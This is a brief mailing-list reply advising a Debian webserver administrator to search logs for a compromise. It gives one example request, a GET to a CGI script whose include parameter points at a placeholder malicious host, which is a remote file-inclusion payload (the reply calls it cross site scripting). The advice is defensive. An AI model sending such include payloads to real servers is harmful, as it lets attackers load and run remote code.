[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Advice needed, trying to find the vulnerable code on Debian webserver.



Ross Tsolakidis wrote:
> One of our webservers seems to get compromised on a daily basis.
> When I do a ps ax I see these processes all the time.

I suspect cross site scripting.  You should parse your logs and search
for requests like:
 GET /~stupiduser/buggy-script.cgi?include=http://www.evilurl/malicious-code.txt

-- 
Alf



Reply to: